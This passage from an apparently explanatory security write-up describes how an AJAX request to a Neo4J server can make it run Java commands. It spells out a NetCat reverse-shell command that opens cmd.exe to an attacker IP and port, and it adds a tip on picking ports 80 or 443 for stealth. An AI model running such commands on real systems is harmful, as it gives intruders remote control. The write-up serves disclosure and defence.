As you saw on by the previous description, this AJAX request triggers the server side execution of:../../nc.exe -e cmd.exe 192.168.213.1 1234

If you are not that familiar with NetCat (nc) here is what that command does:

nc.exe : starts NetCat

-e cmd.exe : starts cmd.exe and binds:

the cmd.exe process Outputstream into the NetCat’s process InputStream, and

the cmd.exe process InputStream into the NetCat’s process OutputStream

192.168.213.1 : IP address of attacker server

1234 : port on the attacker's IP (which could be set 80 or 443 to try to make the attack more stealth)

When a feature is a vulnerability

This case is interesting because the capability to run java commands on the server is a big feature that comes by default with Neo4J (which means that 'this feature' it is part of what makes Neo4J popular, and there is little chance it will be removed)